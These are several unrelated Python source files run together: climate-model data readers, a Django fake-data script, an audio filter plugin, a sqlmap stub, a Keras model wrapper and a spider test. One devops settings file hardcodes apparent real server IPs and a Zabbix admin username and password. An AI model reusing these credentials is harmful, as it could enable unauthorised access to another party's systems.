routine_down = self.dic_vars['sis']
#sw_down = self.get_surface_shortwave_radiation_down(interval=interval, **kwargs)
cmd = 'sw_down = self.' + routine_down
exec(cmd)
#sw_up = self.get_surface_shortwave_radiation_up(interval=interval, **kwargs)
cmd = 'sw_up = self.' + routine_up
exec(cmd)
# climatological mean
alb = sw_up[0].div(sw_down[0])
alb.label = self.experiment + ' albedo'
alb.unit = '-'
# original data
alb_org = sw_up[1][2].div(sw_down[1][2])
alb_org.label = self.experiment + ' albedo'
alb_org.unit = '-'
retval = (alb_org.time, alb_org.fldmean(), alb_org)
return alb, retval
def get_albedo_data_vis(self, interval='season', **kwargs):
"""
This routine retrieves the JSBACH albedo information for VIS
it requires a preprocessing with a script that aggregates from tile
to box values!
Parameters
----------
interval : str
['season','monthly']
"""
#~ tmpdict = copy.deepcopy(self.model_dict['albedo_vis'])
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_albedo_data_nir(self, interval='season', **kwargs):
"""
This routine retrieves the JSBACH albedo information for VIS
it requires a preprocessing with a script that aggregates from tile
to box values!
Parameters
----------
interval : str
['season','monthly']
"""
#~ tmpdict = copy.deepcopy(self.model_dict['albedo_nir'])
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_up(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_surface_shortwave_radiation_down(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_rainfall_data(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_temperature_2m(self, interval='season', **kwargs):
return self.get_jsbach_data_generic(interval=interval, **kwargs)
def get_jsbach_data_generic(self, interval='season', **kwargs):
"""
unique parameters are:
filename - file basename
variable - name of the variable as the short_name in the netcdf file
kwargs is a dictionary with keys for each model. Then a dictionary with properties follows
"""
if not self.type in kwargs.keys():
print 'WARNING: it is not possible to get data using generic function, as method missing: ', self.type, kwargs.keys()
return None
print self.type
print kwargs
locdict = kwargs[self.type]
# read settings and details from the keyword arguments
# no defaults; everything should be explicitely specified in either the config file or the dictionaries
varname = locdict.pop('variable')
units = locdict.pop('unit', 'Unit not specified')
lat_name = locdict.pop('lat_name', 'lat')
lon_name = locdict.pop('lon_name', 'lon')
#model_suffix = locdict.pop('model_suffix')
#model_prefix = locdict.pop('model_prefix')
file_format = locdict.pop('file_format')
scf = locdict.pop('scale_factor')
valid_mask = locdict.pop('valid_mask')
custom_path = locdict.pop('custom_path', None)
thelevel = locdict.pop('level', None)
target_grid = self._actplot_options['targetgrid']
interpolation = self._actplot_options['interpolation']
if self.type != 'JSBACH_RAW2':
print self.type
raise ValueError('Invalid data format here!')
# define from which stream of JSBACH data needs to be taken for specific variables
if varname in ['swdown_acc', 'swdown_reflect_acc']:
filename1 = self.files['jsbach']
elif varname in ['precip_acc']:
filename1 = self.files['land']
elif varname in ['temp2']:
filename1 = self.files['echam']
elif varname in ['var14']: # albedo vis
filename1 = self.files['albedo_vis']
elif varname in ['var15']: # albedo NIR
filename1 = self.files['albedo_nir']
else:
print varname
raise ValueError('Unknown variable type for JSBACH_RAW2 processing!')
force_calc = False
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
#/// PREPROCESSING ///
cdo = Cdo()
s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing! ')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, level=thelevel, time_cycle=thetime_cylce)
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.model + ' std', unit='-', lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel)
mdata.n = mdata_N.data.copy()
del mdata_N
#ensure that climatology always starts with J anuary, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.model, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, time_cycle=12, scale_factor=scf, level=thelevel)
mdata_all.adjust_time(day=15)
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
class JSBACH_SPECIAL(JSBACH_RAW2):
"""
special class for more flexible reading of JSBACH input data
it allows to specify the input format and the directory of the input data
in case that you use a different setup, it is probably easiest to
just copy this class and make the required adaptations.
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, model_dict=None, input_format='nc', raw_outdata='', **kwargs):
super(JSBACH_SPECIAL, self).__init__(filename, dic_variables, experiment, name=name, shift_lon=shift_lon, model_dict=model_dict, input_format=input_format, raw_outdata=raw_outdata, **kwargs)
class xxxxxxxxJSBACH_RAW(Model):
"""
Class for RAW JSBACH model output
works on manually preprocessed already concatenated data
"""
def __init__(self, filename, dic_variables, experiment, name='', shift_lon=False, intervals='monthly', **kwargs):
super(JSBACH_RAW, self).__init__(filename, dic_variables, name=name, intervals=intervals, **kwargs)
print('WARNING: This model class should be depreciated as it contained a lot of hardcoded dependencies and is only intermediate')
#TODO: depreciate this class
stop
self.experiment = experiment
self.shift_lon = shift_lon
self.type = 'JSBACH_RAW'
self._unique_name = self._get_unique_name()
def _get_unique_name(self):
"""
get unique name from model and experiment
"""
return self.name.replace(' ', '') + '-' + self.experiment.replace(' ', '')
def get_temperature_2m(self, interval='monthly', **kwargs):
"""
get surface temperature (2m) from JSBACH model results
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'temp2'
rawfile = self.data_dir + self.experiment + '_echam6_echam_' + variable + '_ALL.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
def get_albedo_data(self, interval='monthly', **kwargs):
"""
calculate albedo as ratio of upward and downwelling fluxes
first the monthly mean fluxes are used to calculate the albedo,
"""
# read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon) # TODO make this more flexible
if self.start_time is None:
raise ValueError('Start time needs to be specified')
if self.stop_time is None:
raise ValueError('Stop time needs to be specified')
Fd = self.get_surface_shortwave_radiation_down(**kwargs)
Fu = self.get_surface_shortwave_radiation_up(**kwargs)
if Fu is None:
print 'File not existing for UPWARD flux!: ', self.name
return None
else:
Fu_i = Fu[0]
if Fu_i is None:
return None
if Fd is None:
print 'File not existing for DOWNWARD flux!: ', self.name
return None
else:
Fd_i = Fd[0]
if Fd_i is None:
return None
lab = Fu_i.label
# albedo for chosen interval as caluclated as ratio of means of fluxes in that interval (e.g. season, months)
Fu_i.div(Fd_i, copy=False)
del Fd_i # Fu contains now the albedo
Fu_i._apply_mask(ls_mask.data)
#albedo for monthly data (needed for global mean plots )
Fu_m = Fu[1][2]
del Fu
Fd_m = Fd[1][2]
del Fd
Fu_m.div(Fd_m, copy=False)
del Fd_m
Fu_m._apply_mask(ls_mask.data)
Fu_m._set_valid_range(0., 1.)
Fu_m.label = lab + ' albedo'
Fu_i.label = lab + ' albedo'
Fu_m.unit = '-'
Fu_i.unit = '-'
# center dates of months
Fu_m.adjust_time(day=15)
Fu_i.adjust_time(day=15)
# return data as a tuple list
retval = (Fu_m.time, Fu_m.fldmean(), Fu_m)
return Fu_i, retval
#-----------------------------------------------------------------------
def _do_preprocessing(self, rawfile, varname, s_start_time, s_stop_time, interval='monthly', force_calc=False, valid_mask='global', target_grid='t63grid'):
"""
perform preprocessing
* selection of variable
* temporal subsetting
"""
cdo = Cdo()
if not os.path.exists(rawfile):
print('File not existing! %s ' % rawfile)
return None, None
# calculate monthly means
file_monthly = get_temporary_directory() + os.sep + os.path.basename(rawfile[:-3]) + '_' + varname + '_' + s_start_time + '_' + s_stop_time + '_mm.nc'
if (force_calc) or (not os.path.exists(file_monthly)):
cdo.monmean(options='-f nc', output=file_monthly, input='-seldate,' + s_start_time + ',' + s_stop_time + ' ' + '-selvar,' + varname + ' ' + rawfile, force=force_calc)
else:
pass
if not os.path.exists(file_monthly):
raise ValueError('Monthly preprocessing did not work! %s ' % file_monthly)
# calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
# read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self.name, shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self.name + ' std', unit='-', shift_lon=False, time_cycle=thetime_cylce, lat_name='lat', lon_name='lon')
mdata.std = mdata_std.data.copy()
del mdata_std
mdata_N = Data(mdata_N_file, varname, read=True, label=self.name + ' std', shift_lon=False, lat_name='lat', lon_name='lon')
mdata.n = mdata_N.data.copy()
del mdata_N
# ensure that climatology always starts with January, therefore set date and then sort
mdata.adjust_time(year=1700, day=15) # set arbitrary time for climatology
mdata.timsort()
#4) read monthly data
mdata_all = Data(file_monthly, varname, read=True, label=self.name, shift_lon=False, time_cycle=12, lat_name='lat', lon_name='lon')
mdata_all.adjust_time(day=15)
#mask_antarctica masks everything below 60 degree S.
#here we only mask Antarctica, if only LAND points shall be used
if valid_mask == 'land':
mask_antarctica = True
elif valid_mask == 'ocean':
mask_antarctica = False
else:
mask_antarctica = False
if target_grid == 't63grid':
mdata._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
mdata_all._apply_mask(get_T63_landseamask(False, area=valid_mask, mask_antarctica=mask_antarctica))
else:
tmpmsk = get_generic_landseamask(False, area=valid_mask, target_grid=target_grid, mask_antarctica=mask_antarctica)
mdata._apply_mask(tmpmsk)
mdata_all._apply_mask(tmpmsk)
del tmpmsk
mdata_mean = mdata_all.fldmean()
# return data as a tuple list
retval = (mdata_all.time, mdata_mean, mdata_all)
del mdata_all
return mdata, retval
def get_surface_shortwave_radiation_down(self, interval='monthly', **kwargs):
"""
get surface shortwave incoming radiation data for JSBACH
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
rawfile = self.data_dir + self.experiment + '_jsbach_' + y1[0: 4] + '_' + y2[0: 4] + '.nc'
mdata, retval = self._do_preprocessing(rawfile, 'swdown_acc', y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
"""
get surface shortwave upward radiation data for JSBACH
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO: move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
rawfile = self.data_dir + self.experiment + '_jsbach_' + y1[0: 4] + '_' + y2[0: 4] + '.nc'
mdata, retval = self._do_preprocessing(rawfile, 'swdown_reflect_acc', y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_model_data_generic(self, interval='monthly', **kwargs):
"""
This is only a wrapper to redirect to individual functions
for the JSBACH_RAW class
Currently only the usage for rainfall is supported!
"""
# HACK: only a wrapper, should be depreciated
raise ValueError('Rainfall analysis not working yet!')
self.get_rainfall_data(interval=interval, **kwargs)
def get_rainfall_data(self, interval='monthly', **kwargs):
"""
get surface rainfall data for JSBACH
uses already preprocessed data where the convective and
advective rainfall has been merged
Parameters
----------
interval : str
specifies the aggregation interval. Possible options: ['season','monthly']
"""
locdict = kwargs[self.type]
y1 = '1980-01-01' # TODO : move this to the JSON dictionary or some parameter file
y2 = '2010-12-31'
variable = 'aprc'
rawfile = self.data_dir + self.experiment + '_echam6_echam_*_precipitation.nc'
files = glob.glob(rawfile)
if len(files) != 1:
print 'Inputfiles: ', files
raise ValueError('Something went wrong: Invalid number of input files!')
else:
rawfile = files[0]
mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
return mdata, retval
#-----------------------------------------------------------------------
def get_gpp_data(self, interval='season'):
"""
get surface GPP data for JSBACH
todo temporal aggregation of data --> or leave it to the user!
"""
cdo = Cdo()
v = 'var167'
y1 = str(self.start_time)[0:10]
y2 = str(self.stop_time)[0:10]
rawfilename = self.data_dir + 'data/model/' + self.experiment + '_' + y1[0:4] + '-' + y2[0:4] + '.nc'
times_in_file = int(''.join(cdo.ntime(input=rawfilename)))
if interval == 'season':
if times_in_file != 4:
tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
cdo.yseasmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_yseasmean.nc')
rawfilename = tmp_file[:-3] + '_yseasmean.nc'
if interval == 'monthly':
if times_in_file != 12:
tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
cdo.ymonmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_ymonmean.nc')
rawfilename = tmp_file[:-3] + '_ymonmean.nc'
if not os.path.exists(rawfilename):
return None
filename = rawfilename
#--- read land-sea mask
ls_mask = get_T63_landseamask(self.shift_lon)
#--- read SW up data
gpp = Data4D(filename, v, read=True,
label=self.experiment + ' ' + v, unit='gC m-2 a-1', lat_name='lat', lon_name='lon',
shift_lon=self.shift_lon,
mask=ls_mask.data.data, scale_factor=3600. * 24. * 30. / 0.083
)
return gpp.sum_data4D()
#-----------------------------------------------------------------------
| pygeo/pycmbs | pycmbs/benchmarking/models/mpi_esm.py | Python | mit | 41,720 |
#!/usr/bin/env python
#coding:utf-8
import os
HOME="/Users/wupeijin/code3/django-tornado"
# home_app=os.path.join(HOME,"mysite/mysite/cheungssh/")
dest_asset_dir="/Users/wupeijin/code3/django-tornado/tmp"
download_dir="/Users/wupeijin/code3/django-tornado/download"
upload_dir="/Users/wupeijin/code3/django-tornado/upload"
download_file_url="/Users/wupeijin/code3/django-tornado/download/file"
keyfile_dir="/Users/wupeijin/code3/django-tornado/keys"
script_dir="/Users/wupeijin/code3/django-tornado/script"
redisip='111.231.82.173'
redisport=23456
redisdb=0
pop3_server='pop3.mxhichina.com'
zabbixurl='http://47.94.89.135/zabbix'
zabbixuser='admin'
zabbixpwd='jinjin123'
| jinjin123/devops2.0 | devops/ops/views/ssh_settings.py | Python | mit | 671 |
#!/usr/bin/env python
# Script that generates some fake data for our library
import os, sys
sys.path.append(os.getcwd())
import django; django.setup()
import random
from django.utils import timezone
from stacks.models import Author, Book, LoanedBook
from libraryusers.models import LibraryUser
from faker import Factory
fake = Factory.create()
from datetime import date, timedelta
NUM_AUTHORS = 200
NUM_BOOKS = 500
NUM_PATRONS = 150
checkout_days = [(date.today() - timedelta(days=x)) for x in range(21)]
# Create a series of fake authors; also create at least one book for each author
for x in range(NUM_AUTHORS):
author = Author.objects.create(first_name=fake.first_name(), last_name=fake.last_name())
try:
b = Book.objects.create(
call_number=fake.numerify(text="###.###"),
page_count=fake.random_int(min=10, max=1001),
title=' '.join(fake.words(nb=fake.random_int(1,6))).title(),
)
b.authors.add(author)
b.save()
except:
pass
authors = Author.objects.all()
for x in range(NUM_BOOKS):
author_set = set()
for y in range(fake.random_int(1,3)):
author_set.add(random.choice(authors))
try:
b = Book.objects.create(
call_number=fake.numerify(text="###.###"),
page_count=fake.random_int(min=10, max=1001),
title=' '.join(fake.words(nb=fake.random_int(1,6))).title(),
)
for author in author_set:
b.authors.add(author)
b.save()
except:
pass
books = list(Book.objects.all())
random.shuffle(books)
# Create a bunch of users and loan books to them
for x in range(NUM_PATRONS):
user_profile = fake.simple_profile()
user = LibraryUser.objects.create(username=user_profile['username'], first_name=fake.first_name(),
last_name=fake.last_name(), email=user_profile['mail'], is_staff=False, is_active=True,
birthdate=user_profile['birthdate'], gender=user_profile['sex'], last_login=timezone.now())
for x in range(fake.random_int(1,5)):
book = books.pop()
checkout_date = random.choice(checkout_days)
due_date = checkout_date + timedelta(days=14)
LoanedBook.objects.create(patron=user, book=book, checkout_date=checkout_date, due_date=due_date)
| jacinda/djangocon2015-admin-talk | library/scripts/generate_random_library.py | Python | gpl-2.0 | 2,331 |
"""
Simple diff FIR linear filter LV2 plugin with AudioLazy.
"""
class Metadata:
author = "Danilo de Jesus da Silva Bellini"
author_homepage = "http://github.com/danilobellini"
author_email = "@".join(["danilo.bellini", "gmail.com"])
license = "GPLv3"
name = "Diff"
uri = author_homepage + "/lz2lv2/diff"
lv2class = "Filter", "Highpass" # See all classes at
# http://lv2plug.in/ns/lv2core/
process = 1 - z ** -1
| danilobellini/lz2lv2 | diff.py | Python | gpl-3.0 | 465 |
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def readFile(self, rFile):
errMsg = "on Microsoft Access it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
errMsg = "on Microsoft Access it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg)
| glaudsonml/kurgan-ai | tools/sqlmap/plugins/dbms/access/filesystem.py | Python | apache-2.0 | 746 |
import numpy as np
import pandas as pd
from IPython import embed
from keras.models import load_model
from keras import backend as K
from qlknn.models.ffnn import determine_settings, _prescale, clip_to_bounds
def rmse(y_true, y_pred):
return K.sqrt(K.mean(K.square( y_true-y_pred )))
class KerasNDNN():
def __init__(self, model, feature_names, target_names,
feature_prescale_factor, feature_prescale_bias,
target_prescale_factor, target_prescale_bias,
feature_min=None, feature_max=None,
target_min=None, target_max=None,
target_names_mask=None,
):
self.model = model
self._feature_names = feature_names
self._target_names = target_names
self._feature_prescale_factor = feature_prescale_factor
self._feature_prescale_bias = feature_prescale_bias
self._target_prescale_factor = target_prescale_factor
self._target_prescale_bias = target_prescale_bias
if feature_min is None:
feature_min = pd.Series({var: -np.inf for var in self._feature_names})
self._feature_min = feature_min
if feature_max is None:
feature_max = pd.Series({var: np.inf for var in self._feature_names})
self._feature_max = feature_max
if target_min is None:
target_min = pd.Series({var: -np.inf for var in self._target_names})
self._target_min = target_min
if target_max is None:
target_max = pd.Series({var: np.inf for var in self._target_names})
self._target_max = target_max
self._target_names_mask = target_names_mask
def get_output(self, inp, clip_low=False, clip_high=False, low_bound=None, high_bound=None, safe=True, output_pandas=True, shift_output_by=0):
"""
This should accept a pandas dataframe, and should return a pandas dataframe
"""
nn_input, safe, clip_low, clip_high, low_bound, high_bound = \
determine_settings(self, inp, safe, clip_low, clip_high, low_bound, high_bound)
nn_input = _prescale(nn_input,
self._feature_prescale_factor.values,
self._feature_prescale_bias.values)
# Apply all NN layers an re-scale the outputs
branched_in = [nn_input.loc[:, self._branch1_names].values,
nn_input.loc[:, self._branch2_names].values]
nn_out = self.model.predict(branched_in) # Get prediction
output = (nn_out - np.atleast_2d(self._target_prescale_bias)) / np.atleast_2d(self._target_prescale_factor)
output -= shift_output_by
output = clip_to_bounds(output, clip_low, clip_high, low_bound, high_bound)
if output_pandas:
output = pd.DataFrame(output, columns=self._target_names)
if self._target_names_mask is not None:
output.columns = self._target_names_mask
return output
class Daniel7DNN(KerasNDNN):
_branch1_names = ['Ati', 'An', 'q', 'smag', 'x', 'Ti_Te']
_branch2_names = ['Ate']
def __init__(self, model, feature_names, target_names,
feature_prescale_factor, feature_prescale_bias,
target_prescale_factor, target_prescale_bias,
feature_min=None, feature_max=None,
target_min=None, target_max=None,
target_names_mask=None,
):
super().__init__(model, feature_names, target_names,
feature_prescale_factor, feature_prescale_bias,
target_prescale_factor, target_prescale_bias,
feature_min=feature_min, feature_max=feature_max,
target_min=target_min, target_max=target_max,
target_names_mask=target_names_mask,
)
self.shift = self.find_shift()
@classmethod
def from_files(cls, model_file, standardization_file):
model = load_model(model_file, custom_objects={'rmse': rmse})
stds = pd.read_csv(standardization_file)
feature_names = pd.Series(cls._branch1_names + cls._branch2_names)
target_names = pd.Series(['efeETG_GB'])
stds.set_index('name', inplace=True)
# Was normalised to s=1, m=0
s_t = 1
m_t = 0
s_sf = stds.loc[feature_names, 'std']
s_st = stds.loc[target_names, 'std']
m_sf = stds.loc[feature_names, 'mean']
m_st = stds.loc[target_names, 'mean']
feature_scale_factor = s_t / s_sf
feature_scale_bias = -m_sf * s_t / s_sf + m_t
target_scale_factor = s_t / s_st
target_scale_bias = -m_st * s_t / s_st + m_t
return cls(model, feature_names, target_names,
feature_scale_factor, feature_scale_bias,
target_scale_factor, target_scale_bias,
)
def get_output(self, inp, clip_low=False, clip_high=False, low_bound=None, high_bound=None, safe=True, output_pandas=True, shift_output=True):
if shift_output:
shift_output_by = self.shift
else:
shift_output_by = 0
output = super().get_output(inp, clip_low=clip_low, clip_high=clip_high, low_bound=low_bound, high_bound=high_bound, safe=safe, output_pandas=output_pandas, shift_output_by=shift_output_by)
return output
def find_shift(self):
# Define a point where the relu is probably 0
nn_input = pd.DataFrame({'Ati': 0, 'An': 0, 'q': 3, 'smag': 3.5, 'x': 0.69, 'Ti_Te': 1, 'Ate': -100}, index=[0])
branched_in = [nn_input.loc[:, self._branch1_names].values,
nn_input.loc[:, self._branch2_names].values]
# Get a function to evaluate the network up until the relu layer
try:
func = K.function(self.model.input, [self.model.get_layer('TR').output])
except ValueError:
raise Exception("'TR' layer not defined, shifting only relevant for new-style NNs")
relu_out = func(branched_in)
if relu_out[0][0, 0] != 0:
raise Exception('Relu is not zero at presumed stable point! Cannot find shift')
nn_out = self.model.predict(branched_in)
output = (nn_out - np.atleast_2d(self._target_prescale_bias)) / np.atleast_2d(self._target_prescale_factor)
shift = output[0][0]
return shift
if __name__ == '__main__':
# Test the function
nn = Daniel7DNN.from_files('../../../IPP-Neural-Networks/Saved-Networks/2018-11-25_Run0161a.h5', 'standardizations_training.csv')
shift = nn.find_shift()
scann = 200
input = pd.DataFrame()
input['Ate'] = np.array(np.linspace(0,14, scann))
input['Ti_Te'] = np.full_like(input['Ate'], 1.33)
input['An'] = np.full_like(input['Ate'], 3.)
input['Ati'] = np.full_like(input['Ate'], 5.75)
input['q'] = np.full_like(input['Ate'], 3)
input['smag'] = np.full_like(input['Ate'], 0.7)
input['x'] = np.full_like(input['Ate'], 0.45)
input = input[nn._feature_names]
fluxes = nn.get_output(input)
print(fluxes)
embed()
| Karel-van-de-Plassche/QLKNN-develop | qlknn/models/kerasmodel.py | Python | mit | 7,180 |
#!/usr/bin/env python
"""
Created by howie.hu at 2018/5/28.
"""
import asyncio
import os
import sys
import pytest
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from owllook.spiders.heiyan_novel_info import HYNovelInfoItem
HTML = """
<!doctype html>
<!--[if lt IE 7]><html class="no-js ie6 oldie" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <![endif]-->
<!--[if IE 7]><html class="no-js ie7 oldie" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <![endif]-->
<!--[if IE 8]><html class="no-js ie8 oldie" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <!--<![endif]--><head>
<title>神仙微信群无广告,神仙微信群最新章节全文阅读,向阳的心的小说_黑岩网_黑岩阅读网</title>
<meta name="keywords" content="神仙微信群,神仙微信群最新章节,神仙微信群无弹窗, 向阳的心">
<meta name="description" content="神仙微信群是由作者(向阳的心)著作的社会题材小说,神仙微信群TXT下载,黑岩每天第一时间内更新神仙微信群最新章节,欢迎收藏。">
<meta name="mobile-agent" content="format=xhtml;url=http://w.heiyan.com/book/62599">
<meta property="og:type" content="社会"/>
<meta property="og:title" content="神仙微信群"/>
<meta property="og:description" content="无意间加入了神仙微信群,生活就此嗨翻天……【黑岩第一部微信红包文,主编力荐好书】"/>
<meta property="og:image" content="http://b.heiyanimg.com/book/62599.jpg@!bm?4"/>
<meta property="og:url" content="http://www.heiyan.com/book/62599"/>
<meta property="og:novel:category" content="社会"/>
<meta property="og:novel:author" content=" 向阳的心"/>
<meta property="og:novel:book_name" content="神仙微信群"/>
<meta property="og:novel:status" content="连载中"/>
<meta property="og:novel:read_url" content="http://www.heiyan.com/book/62599"/>
<meta property="og:novel:update_time" content="昨天22:52"/>
<meta property="og:novel:latest_chapter_name" content="2362 禁忌之恋"/>
<meta property="og:novel:latest_chapter_url" content="http://www.heiyan.com/book/62599/2424103"/>
<link rel="stylesheet" type="text/css" href="http://st.heiyanimg.com/_static/components/jqueryui/themes/ui-lightness/jquery-ui.min.css" media="all" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Cache-Control" content="no-transform" />
"""
def test_heiyan_novel_info():
url = 'http://www.heiyan.com/book/62599'
